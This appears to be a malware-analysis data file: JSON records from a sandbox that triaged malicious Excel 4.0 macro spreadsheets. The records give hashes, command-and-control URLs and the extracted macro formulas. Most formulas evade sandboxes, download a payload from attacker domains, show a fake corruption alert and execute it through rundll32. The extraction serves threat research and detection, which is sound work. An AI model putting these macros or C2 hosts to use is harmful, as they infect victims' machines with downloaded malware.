corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OIqrGjii0H\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7da658064b5a83148a4e73d0a09b0c46161965b18212c64578b636f050099546"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7da658064b5a83148a4e73d0a09b0c46161965b18212c64578b636f050099546","filesize":152576,"md5":"8f960126c140e3c0b7633ba2d331ad24","sha1":"a9210d544ab0ac08dcdfd7525d589e3bb8bd7a7a","sha256":"7da658064b5a83148a4e73d0a09b0c46161965b18212c64578b636f050099546","sha512":"6efb37453a1d9f7664f49f27c55da25889390f973a81f2397f4421d665f224d6256c7b6872626c22011daa6605f2a538bef41aa5402c70d08d8fcc16b1438eb8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7da658064b5a83148a4e73d0a09b0c46161965b18212c64578b636f050099546.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"X3AEQHyDTG\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7dc2497c9a728856d7e87c344ae3aababcffae968a7995a8dca07766db47bcae"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7dc2497c9a728856d7e87c344ae3aababcffae968a7995a8dca07766db47bcae","filesize":136192,"md5":"0ec3c097ab7b84c7ac30eaaadc8bf1db","sha1":"235355814616d97e4115edf5231cf4c7b83151be","sha256":"7dc2497c9a728856d7e87c344ae3aababcffae968a7995a8dca07766db47bcae","sha512":"3c83b7c8ad059950032c55c3364e14623c1161f0bd5c75151cc54c24c78f3acc659a3d5b70a067997fcedf1b71043607d43b9549815d70e043ee2e1262d34fee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7dc2497c9a728856d7e87c344ae3aababcffae968a7995a8dca07766db47bcae.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$9C$7,R$9C$11,R$9C$15,R$9C$19)\nSUM(R$11C$7,R$11C$11,R$11C$15,R$11C$19)\nSUM(R$12C$7,R$12C$11,R$12C$15,R$12C$19)\nSUM(R$13C$7,R$13C$11,R$13C$15,R$13C$19)\nSUM(R$43C$7,R$43C$11,R$43C$15,R$43C$19)\nSUM(R$44C$7,R$44C$11,R$44C$15,R$44C$19)\nSUM(R$45C$7,R$45C$11,R$45C$15,R$45C$19)\nSUM(R$46C$7,R$46C$11,R$46C$15,R$46C$19)\nSUM(R$47C$7,R$47C$11,R$47C$15,R$47C$19)\nSUM(R$52C$7,R$52C$11,R$52C$15,R$52C$19)\nSUM(R$53C$7,R$53C$11,R$53C$15,R$53C$19)\nSUM(R$54C$7,R$54C$11,R$54C$15,R$54C$19)\nSUM(R$55C$7,R$55C$11,R$55C$15,R$55C$19)\nSUM(R$56C$7,R$56C$11,R$56C$15,R$56C$19)\nSUM(R$63C$7,R$63C$11,R$63C$15,R$63C$19)\nSUM(R$64C$7,R$64C$11,R$64C$15,R$64C$19)\nSUM(R$65C$7,R$65C$11,R$65C$15,R$65C$19)\nSUM(R$66C$7,R$66C$11,R$66C$15,R$66C$19)\nSUM(R$67C$7,R$67C$11,R$67C$15,R$67C$19)\nSUM(R$73C$7,R$73C$11,R$73C$15,R$73C$19)\nSUM(R$74C$7,R$74C$11,R$74C$15,R$74C$19)\nSUM(R$75C$7,R$75C$11,R$75C$15,R$75C$19)\nSUM(R$76C$7,R$76C$11,R$76C$15,0)\nSUM(R$77C$7,R$77C$11,R$77C$15,R$77C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7dc4e21380ada41c9583d07ec22fd39a743a1dab64e8769aef909609919b7585"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7dc4e21380ada41c9583d07ec22fd39a743a1dab64e8769aef909609919b7585","filesize":206336,"md5":"4f7bab5ef0e16674309e48c0e35f5c96","sha1":"650754eb83beda75487d1e9cb98e67ec9e28b2b6","sha256":"7dc4e21380ada41c9583d07ec22fd39a743a1dab64e8769aef909609919b7585","sha512":"e3c77c3d59e45e72fed72225d500d805bce6142093da624b1974c056a70df404b83a2a0031c8a61556dc53cab67b89676932f954ef7c0c10ec06bcc325f78fb0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7dc4e21380ada41c9583d07ec22fd39a743a1dab64e8769aef909609919b7585.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tebskCRUM3\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7df6fe4919f4c2ff1066fe12aa274c9bb9df2bf3a8de92f2ecbf7f7bbfc26cb3"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7df6fe4919f4c2ff1066fe12aa274c9bb9df2bf3a8de92f2ecbf7f7bbfc26cb3","filesize":185344,"md5":"0d75f5cb94ed76f72773edb599d4f76b","sha1":"afb459064e43fed0938237ff3319a8fcae6310d9","sha256":"7df6fe4919f4c2ff1066fe12aa274c9bb9df2bf3a8de92f2ecbf7f7bbfc26cb3","sha512":"460f3a79a48c58f829c5ef695e4b1078bd829ac71d3c88adde2011a4e4a308713c32f8fe44d24a8282c7ff613d0522ddb1f05f2ec3ac81e205ae943342d283a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7df6fe4919f4c2ff1066fe12aa274c9bb9df2bf3a8de92f2ecbf7f7bbfc26cb3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7dffea2224dd2776a004bc1b5466e83785c3d488dd1d7e8eb23baf4371810dba"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7dffea2224dd2776a004bc1b5466e83785c3d488dd1d7e8eb23baf4371810dba","filesize":209920,"md5":"35beff197d3d447d0d7296d35550d76c","sha1":"e83ad264b600a305c1ce632ef1b83acb9f388c3f","sha256":"7dffea2224dd2776a004bc1b5466e83785c3d488dd1d7e8eb23baf4371810dba","sha512":"e77d670b0965f91b6deae7530bd168d877bd6c09e7d2b46da4de0e428f69a08a079a6e5aff5c2e8486363948701fa5feb658ec759fa19b3b75017fb485f25929","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7dffea2224dd2776a004bc1b5466e83785c3d488dd1d7e8eb23baf4371810dba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"godZBOHeRh\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e025077e62127cfa4f99585a14fd7197643040e9a7018d4b2ce730e2917dc2d"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7e025077e62127cfa4f99585a14fd7197643040e9a7018d4b2ce730e2917dc2d","filesize":193536,"md5":"c6284c35b1a11508e53179ca71f2f7f0","sha1":"d91cb3514741ef41eda4a14e84902436e313d721","sha256":"7e025077e62127cfa4f99585a14fd7197643040e9a7018d4b2ce730e2917dc2d","sha512":"f2a35e476aa70519411985349bc1ee6c934810b7f5223fbc258a4962fc62e557406918bfba07e06c88a97b2f42cec05765e7ebcce51e55d1af9aa145cdd4fb39","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e025077e62127cfa4f99585a14fd7197643040e9a7018d4b2ce730e2917dc2d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/test"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e35b491ab6061b004db93aed863bf75900c16cfefb6cc1420c71ce5dddb8ed6"},"analysis":{"reported":"2020-04-09T16:17:16Z","score":10},"files":[{"filename":"7e35b491ab6061b004db93aed863bf75900c16cfefb6cc1420c71ce5dddb8ed6","filesize":167936,"md5":"d7655a1b6422671fc7341e39b97def91","sha1":"7349e2b24167eaf48272a3a0287247ef54e1959b","sha256":"7e35b491ab6061b004db93aed863bf75900c16cfefb6cc1420c71ce5dddb8ed6","sha512":"c4073071c23c4d2fab07e063cc4e8f3e0a1c663e6f9a532afa35c102b25d8f7bd91297aca33b1a9e9012629b16370b43d270a0df918696c8ef36b0ee125770b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e35b491ab6061b004db93aed863bf75900c16cfefb6cc1420c71ce5dddb8ed6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uw1urGcDdw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e44d2e9336e7bf2824076faa5460a416b9244e1dc1b023e3cf6bb5eaffe0304"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7e44d2e9336e7bf2824076faa5460a416b9244e1dc1b023e3cf6bb5eaffe0304","filesize":170496,"md5":"d8615e41c8508b97c5eb0aa91971ac52","sha1":"2b265612451a13c3c3e399d31f605167d172f53c","sha256":"7e44d2e9336e7bf2824076faa5460a416b9244e1dc1b023e3cf6bb5eaffe0304","sha512":"c924bf3490f4a6c5e6d54ae6b47afebbd2bd32e041997857205ff85d7893de5e5f4bbd56979c7407b73b1dc6cee84e4af5ca3da4200ef57039f77ed499c02fa4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e44d2e9336e7bf2824076faa5460a416b9244e1dc1b023e3cf6bb5eaffe0304.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ihzQeD7fLl\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e4ef2167d7a5251d70902c1c80fc9e458bfa283c9838dc78d0a9db440027bed"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7e4ef2167d7a5251d70902c1c80fc9e458bfa283c9838dc78d0a9db440027bed","filesize":167936,"md5":"81fa8de89b01815053c63919b1548844","sha1":"72c2a9293425702c27d43b2d5e81408b5628aedb","sha256":"7e4ef2167d7a5251d70902c1c80fc9e458bfa283c9838dc78d0a9db440027bed","sha512":"c4aa29a8e1a7bd6c79529b9e65c600fe9bdf000dd5ccb18dbbb654b102a3d9f19a5c9e5e9d9a6512d99b9b3010d20ad4bf4f8eea1acab23985f60e96f5b18d24","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e4ef2167d7a5251d70902c1c80fc9e458bfa283c9838dc78d0a9db440027bed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ayiKQ7rQnm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e57812423ce66917ae9aa37c24d9dbd8ea3f747f51efd2bb216c4c41fe69972"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7e57812423ce66917ae9aa37c24d9dbd8ea3f747f51efd2bb216c4c41fe69972","filesize":206336,"md5":"a5a84a92aa08166dc0d91a6494a3a897","sha1":"1247736120040bb6ac64b0bacd5b300c2414a507","sha256":"7e57812423ce66917ae9aa37c24d9dbd8ea3f747f51efd2bb216c4c41fe69972","sha512":"720e015f8ce88c70ace10de6a344019b14774b5e425c90309db521b4149d428c0ee477477b3e6833c4c41d3338719318c0a51aae2d4896e04ac553162a0bcb9e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e57812423ce66917ae9aa37c24d9dbd8ea3f747f51efd2bb216c4c41fe69972.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AI3ZydgtYu\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e6f770b4acc0d36e85b330b51592da2def7d1fae959fa5e1270d5b0067539d2"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7e6f770b4acc0d36e85b330b51592da2def7d1fae959fa5e1270d5b0067539d2","filesize":167936,"md5":"1feddfbc5691eb47e324e057c32a6d92","sha1":"6451c7cd558d021bbe426e8ebbefd9e6a47197c9","sha256":"7e6f770b4acc0d36e85b330b51592da2def7d1fae959fa5e1270d5b0067539d2","sha512":"76fc6a5650383abd2175bf9d67336d2730181434f105b5cb61a4bbe0f2bd1d6988b71ea11845a702a55eadc94730d2ce3245f447df8b3ea35c48428c7a0a5a02","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e6f770b4acc0d36e85b330b51592da2def7d1fae959fa5e1270d5b0067539d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dmk17WfFDE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e71cf6e25e27c7075544a8ec83c2dfd85e8de15ba954481d9e360094586a877"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7e71cf6e25e27c7075544a8ec83c2dfd85e8de15ba954481d9e360094586a877","filesize":116224,"md5":"f5d92aa7ccdb2db8b05ad733d68a6cc9","sha1":"b30d66bba4789f7ef25eb98ca4e958fe64f798b6","sha256":"7e71cf6e25e27c7075544a8ec83c2dfd85e8de15ba954481d9e360094586a877","sha512":"2bf40f1c57f4a7492629abea92926635de3c81207ac7c835f5d3cfa1d417a49784539b953f2f2d04d1ca7cb9452aa5247e4625afda56d82c8c6e11086f7cab58","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e71cf6e25e27c7075544a8ec83c2dfd85e8de15ba954481d9e360094586a877.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wGhoqghm59\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e993ffd69f79bc73b8217673cc342db7299e5f22845213ee79291c281b8df34"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7e993ffd69f79bc73b8217673cc342db7299e5f22845213ee79291c281b8df34","filesize":177152,"md5":"51026a94f49cec8c3ee30e7002e0aebf","sha1":"1c8a7330fe05d81552c2dbb3023180ea7905ca93","sha256":"7e993ffd69f79bc73b8217673cc342db7299e5f22845213ee79291c281b8df34","sha512":"072d7c43c1421619d2f3546bf921f73f5983de71225e7913afe555bedcb5e09971ba9523e89f57af820270ab43f87a64559391db633918324cae49040e2d25d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e993ffd69f79bc73b8217673cc342db7299e5f22845213ee79291c281b8df34.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CzTLFWfyBD\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7e9a3330edfeb3cbb666dd619a976c83e8032c695bdc6e6345de373f003ffe0e"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7e9a3330edfeb3cbb666dd619a976c83e8032c695bdc6e6345de373f003ffe0e","filesize":167936,"md5":"12d1bfca7b4a65c9f813883028c0eacf","sha1":"30c4582cc9df30a2cc8ae2f673bf067c438b3c50","sha256":"7e9a3330edfeb3cbb666dd619a976c83e8032c695bdc6e6345de373f003ffe0e","sha512":"3be051f82ef6c68a52110dee7b479908e44a2fb5fc15b1ed96f0431ceccf96d51a0eaa391b8f5ae89fdcc37d525f9af321576b28163641eda1dba1c27760373d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7e9a3330edfeb3cbb666dd619a976c83e8032c695bdc6e6345de373f003ffe0e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NNyq7KECrJ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7eba2d53ee013d05b4257e443e11afdf27fe04c0ba7bd58e2264aefd42981a5a"},"analysis":{"reported":"2020-04-09T16:17:17Z","score":10},"files":[{"filename":"7eba2d53ee013d05b4257e443e11afdf27fe04c0ba7bd58e2264aefd42981a5a","filesize":141824,"md5":"014696c3d1633ef912470bb052702dd4","sha1":"5f77af8663c8ef60d2fcd5b7200424d5efa18c2c","sha256":"7eba2d53ee013d05b4257e443e11afdf27fe04c0ba7bd58e2264aefd42981a5a","sha512":"8dda458223f804ee34b888886c5e8c0fbd14870494d19218c3a2e9fdead9f45d211044a85dc14b1a5cedde8c2875414b15cff8f2881b530a81972eb2a809093e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7eba2d53ee013d05b4257e443e11afdf27fe04c0ba7bd58e2264aefd42981a5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"yfAw7SlJ7j\",TRUE)\nRETURN()\nRETURN()"}}}]}
